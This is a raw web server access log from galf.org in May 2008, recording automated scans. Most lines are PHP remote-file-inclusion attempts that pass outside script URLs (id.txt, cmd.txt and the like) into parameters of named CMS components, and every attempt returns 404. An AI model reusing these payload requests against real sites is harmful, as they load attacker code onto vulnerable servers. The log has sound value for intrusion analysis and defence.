85.19.150.85 - - [04/May/2008:17:00:03 -0700] "GET /logs/access.log//index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
85.19.150.85 - - [04/May/2008:17:00:03 -0700] "GET //index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
85.19.150.85 - - [04/May/2008:17:00:03 -0700] "GET /logs//index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.32.68.172 - - [04/May/2008:17:00:17 -0700] "GET /logs/access_071231.log/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:00:17 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:00:17 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:00:30 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:00:31 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:00:31 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:00:35 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:00:36 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:00:36 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.130.198 - - [04/May/2008:17:01:11 -0700] "GET /index.php?pageurl=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:01:12 -0700] "GET /logs/access_071231.log/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:01:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:01:12 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.98.95.186 - - [04/May/2008:17:01:21 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
65.98.95.186 - - [04/May/2008:17:01:21 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
65.98.95.186 - - [04/May/2008:17:01:21 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
83.175.248.213 - - [04/May/2008:17:01:38 -0700] "GET /logs/access_080114.log/components/com_mp3_allopass/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.175.248.213 - - [04/May/2008:17:01:40 -0700] "GET /components/com_mp3_allopass/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
78.90.30.31 - - [04/May/2008:17:01:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:02:03 -0700] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:02:03 -0700] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:02:05 -0700] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:02:07 -0700] "GET /logs/access_080331.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
221.128.79.156 - - [04/May/2008:17:02:07 -0700] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:02:13 -0700] "GET /logs/access_080331.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.175.248.213 - - [04/May/2008:17:02:46 -0700] "GET /logs/access_080317.log/components/com_mp3_allopass/errors.php?error=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:02:58 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:02:59 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:02:59 -0700] "GET /logs/access_071112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.101.26.99 - - [04/May/2008:17:02:59 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:02:59 -0700] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:02:59 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:02:59 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:03:00 -0700] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:03:01 -0700] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:03:01 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:03:01 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:03:03 -0700] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
78.90.30.31 - - [04/May/2008:17:04:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
202.28.68.88 - - [04/May/2008:17:04:54 -0700] "GET /logs/access.log//details.php?loc=http://www.snd.fr/upload/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.226.248.111 - - [04/May/2008:17:04:59 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.226.248.111 - - [04/May/2008:17:04:59 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.226.248.111 - - [04/May/2008:17:05:00 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:17:05:10 -0700] "GET /logs/access_080113.log//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:05:32 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:05:32 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:05:33 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.51.25.186 - - [04/May/2008:17:06:04 -0700] "GET /logs/access_071231.log/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.225.229.167 - - [04/May/2008:17:06:26 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:08:51 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:08:51 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:08:52 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:08:52 -0700] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.19.150.85 - - [04/May/2008:17:09:17 -0700] "GET /logs/access_071203.log//modules/xfsection/modify.php?dir_module=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.149.209.100 - - [04/May/2008:17:09:28 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.149.209.100 - - [04/May/2008:17:09:28 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
62.149.209.100 - - [04/May/2008:17:09:28 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
216.6.180.69 - - [04/May/2008:17:10:12 -0700] "GET /logs/access_070826.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:10:12 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:10:12 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:12 -0700] "GET /logs/access_070826.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:12 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:13 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:41 -0700] "GET /logs/access_070827.log/modules/My_eGallery/public/displayCategory.php?basepath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:10:43 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:47 -0700] "GET /logs/access_071105.log/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:47 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:10:47 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:10:51 -0700] "GET /logs//content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.106.130.148 - - [04/May/2008:17:11:02 -0700] "GET /logs/access_070723.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.130.148 - - [04/May/2008:17:11:02 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.130.148 - - [04/May/2008:17:11:05 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.130.148 - - [04/May/2008:17:11:05 -0700] "GET /logs/access_070903.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:11:06 -0700] "GET /logs/access_080324.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:11:06 -0700] "GET //tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:11:06 -0700] "GET /logs//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.137.192.95 - - [04/May/2008:17:11:07 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.137.192.95 - - [04/May/2008:17:11:08 -0700] "GET /logs/access_080128.log//skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.137.192.95 - - [04/May/2008:17:11:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
83.137.192.95 - - [04/May/2008:17:11:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:11:15 -0700] "GET /logs/access_080324.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:11:16 -0700] "GET //tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:11:16 -0700] "GET /logs//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:11:16 -0700] "GET /logs/access_080324.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:11:17 -0700] "GET //tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:11:17 -0700] "GET /logs//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.86.76.34 - - [04/May/2008:17:11:34 -0700] "GET /logs/access_080414.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:11:44 -0700] "GET /logs/access_080324.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:11:44 -0700] "GET //tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
75.126.115.170 - - [04/May/2008:17:11:45 -0700] "GET /logs/access_071231.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [04/May/2008:17:11:45 -0700] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:11:46 -0700] "GET /logs//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:11:51 -0700] "GET /logs/access_070903.log/components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:12:00 -0700] "GET /logs/access_080414.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.16.16.208 - - [04/May/2008:17:12:00 -0700] "GET /logs/access_080414.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:12:25 -0700] "GET /index1.php?page=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:12:26 -0700] "GET /index1.php?page=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.148.95.154 - - [04/May/2008:17:13:05 -0700] "GET /logs/access_080414.log//tags.php?BBCodeFile=http://xdengue0.iespana.es/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:13:06 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:13:07 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.12.53.176 - - [04/May/2008:17:13:09 -0700] "GET /logs/access.log//index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:13:10 -0700] "GET //index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
195.12.53.176 - - [04/May/2008:17:13:10 -0700] "GET /logs//index.php?option=com_log/modules/My_eGallery/index.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
75.126.115.170 - - [04/May/2008:17:13:26 -0700] "GET /logs/access.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:13:37 -0700] "GET /logs/access_071014.log/index1.php?page=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:13:38 -0700] "GET /logs/access_071014.log/index1.php?page=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:13:38 -0700] "GET /logs/index1.php?page=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.23.40 - - [04/May/2008:17:13:38 -0700] "GET /logs/index1.php?page=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:14:32 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.6.180.69 - - [04/May/2008:17:14:32 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.130.198 - - [04/May/2008:17:14:52 -0700] "GET /logs/access_080225.log/index.php?pageurl=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
205.234.130.198 - - [04/May/2008:17:14:52 -0700] "GET /logs/index.php?pageurl=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
205.234.130.198 - - [04/May/2008:17:14:52 -0700] "GET /logs/access_080303.log/index.php?pageurl=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:14:58 -0700] "GET /logs/access_070806.log/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:14:58 -0700] "GET /index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.68.172 - - [04/May/2008:17:14:58 -0700] "GET /logs/index.php?pagina=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.180.251.34 - - [04/May/2008:17:15:00 -0700] "GET /index.php?u=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
201.12.151.34 - - [04/May/2008:17:15:02 -0700] "GET /logs/access_071231.log/claroline/inc/claro_init_header.inc.php?includePath=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
62.149.209.100 - - [04/May/2008:17:15:02 -0700] "GET /logs/access_070827.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.12.151.34 - - [04/May/2008:17:15:02 -0700] "GET /logs/access_071231.log/claroline/inc/claro_init_header.inc.php?includePath=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
201.12.151.34 - - [04/May/2008:17:15:03 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
